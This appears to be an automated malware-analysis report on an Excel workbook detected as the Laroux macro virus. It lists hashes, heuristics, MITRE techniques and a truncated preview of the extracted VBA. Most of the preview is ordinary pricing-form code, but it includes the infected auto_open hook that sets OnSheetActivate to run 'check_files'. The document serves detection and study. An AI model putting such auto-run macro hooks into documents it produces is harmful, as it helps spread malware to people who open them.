Xls.Trojan.Laroux-28 — Office (OLE) malware analysis

Static analysis result for SHA-256 6caeb9ed6c397f93…

MALICIOUS

Office (OLE)

62.5 KB Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: 37fc8ae092b168187b3abe5ab4aad2d0 SHA-1: bcbbe0c6f993f0e7123cec13fa52135e3a823dda SHA-256: 6caeb9ed6c397f93ea31e152023b8a7dc7251ce7c55133f1c8f4dcd9a42e7987
240 Risk Score

Malware Insights

Xls.Trojan.Laroux-28 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

This Excel file contains a critical 'Laroux' macro marker and is detected by ClamAV as Xls.Trojan.Laroux-28. The auto_open macro is configured to execute the 'check_files' subroutine upon opening, which is a common technique for malware to establish persistence or initiate malicious actions. The script also attempts to add custom command bars, indicating an effort to interact with the user interface for malicious purposes.

Heuristics 4

  • ClamAV: Xls.Trojan.Laroux-28 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Laroux-28
  • Excel 5 Laroux/Larou-CV macro-virus marker cluster critical OLE_XLS5_LAROUX_MACRO_VIRUS
    Legacy Excel workbook contains a Laroux/Larou-CV macro-virus marker cluster including auto_open execution and workbook/module replication strings. This is a narrow indicator for an infected legacy Excel macro workbook.
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 30528 bytes
SHA-256: 78984b347c4de27f33f000870b5344d6ab1d28a17bf7c2afa2f7eea57a69863c
Detection
ClamAV: Xls.Trojan.Laroux-28
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "pldt"

Global X, Y, ContSet, Markup As Integer

Sub auto_open()
Attribute auto_open.VB_ProcData.VB_Invoke_Func = " \n14"
     Application.OnSheetActivate = "check_files"
     On Error GoTo TheEnd
     CommandBars.Add(Name:="Pricing", Position:=msoBarFloating, temporary:=True).Visible = True
     Set cbutton1 = CommandBars("Pricing").Controls.Add(Type:=msoControlButton, before:=1, temporary:=True)
     Set cbutton2 = CommandBars("Pricing").Controls.Add(Type:=msoControlButton, before:=2, temporary:=True)
     cbutton1.Visible = True
     cbutton1.Style = msoButtonIconAndCaption
     cbutton1.Caption = "&Insert"
     cbutton1.OnAction = "InsertRow"
     cbutton1.FaceId = 296
     cbutton2.Visible = True
     cbutton2.Style = msoButtonIconAndCaption
     cbutton2.Caption = "&Delete"
     cbutton2.OnAction = "DeleteRow"
     cbutton2.FaceId = 293
TheEnd:
End Sub

Public Sub EnableCustom()
Attribute EnableCustom.VB_ProcData.VB_Invoke_Func = " \n14"
    frmCont.txtRack.Enabled = True
    frmCont.lblRack.Enabled = True
    frmCont.txtASRS.Enabled = True
    frmCont.lblASRS.Enabled = True
    frmCont.txtLoad.Enabled = True
    frmCont.lblLoad.Enabled = True
    frmCont.txtSecondary.Enabled = True
    frmCont.lblSecondary.Enabled = True
    frmCont.txtControls.Enabled = True
    frmCont.lblControls.Enabled = True
    frmCont.txtInventory.Enabled = True
    frmCont.lblInventory.Enabled = True
    frmCont.txtPower.Enabled = True
    frmCont.lblPower.Enabled = True
    frmCont.txtMisc.Enabled = True
    frmCont.lblMisc.Enabled = True
    frmCont.txtFire.Enabled = True
    frmCont.lblFire.Enabled = True
    frmCont.txtTransportation.Enabled = True
    frmCont.lblTransportation.Enabled = True
    frmCont.lblTotal.Enabled = True
    frmCont.lblPercent.Enabled = True
End Sub

Public Sub DisableCustom()
Attribute DisableCustom.VB_ProcData.VB_Invoke_Func = " \n14"
    frmCont.txtRack.Enabled = False
    frmCont.lblRack.Enabled = False
    frmCont.txtASRS.Enabled = False
    frmCont.lblASRS.Enabled = False
    frmCont.txtLoad.Enabled = False
    frmCont.lblLoad.Enabled = False
    frmCont.txtSecondary.Enabled = False
    frmCont.lblSecondary.Enabled = False
    frmCont.txtControls.Enabled = False
    frmCont.lblControls.Enabled = False
    frmCont.txtInventory.Enabled = False
    frmCont.lblInventory.Enabled = False
    frmCont.txtPower.Enabled = False
    frmCont.lblPower.Enabled = False
    frmCont.txtMisc.Enabled = False
    frmCont.lblMisc.Enabled = False
    frmCont.txtFire.Enabled = False
    frmCont.lblFire.Enabled = False
    frmCont.txtTransportation.Enabled = False
    frmCont.lblTransportation.Enabled = False
    frmCont.lblPercent.Enabled = False
    frmCont.lblTotal.Enabled = False
End Sub

Public Sub GetPercentCustom()
Attribute GetPercentCustom.VB_ProcData.VB_Invoke_Func = " \n14"
    Dim I As Double
    'Gets Rack %
    frmCont.txtRack.Text = Range("RackCont")
    I = frmCont.txtRack.Text * 100
    I = Format(I, "##0.0")
    frmCont.txtRack.Text = I
    'Gets AS/RS %
    frmCont.txtASRS.Text = Range("ASRSCont")
    I = frmCont.txtASRS.Text * 100
    I = Format(I, "##0.0")
    frmCont.txtASRS.Text = I
    'Gets Load Handling Equipment %
    frmCont.txtLoad.Text = Range("LoadCont")
    I = frmCont.txtLoad.Text * 100
    I = Format(I, "##0.0")
    frmCont.txtLoad.Text = I
    'Gets Secondary Load Handling Equipment %
    frmCont.txtSecondary.Text = Range("SecondCont")
    I = frmCont.txtSecondary.Text * 100
    I = Format(I, "##0.0")
    frmCont.txtSecondary.Text = I
    'Gets Controls %
    frmCont.txtControls.Text = Range("ControlCont")
    I = frmCont.txtControls.Text * 100
    I = Format(I, "##0.0")
    frmCont.txtControls.Text = I
    'Gets Inventory %
    frmCont.txtInventory.Text = Range("SoftCont") + Range("HardCont")
    I = frmCont.txtInventory.Text * 100
    I = Format(I, "##0.0")
    frmCont.txtInventory.Text = I
    'Gets Power Distibution & Communication System %
    frmCont.txtPower.T
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.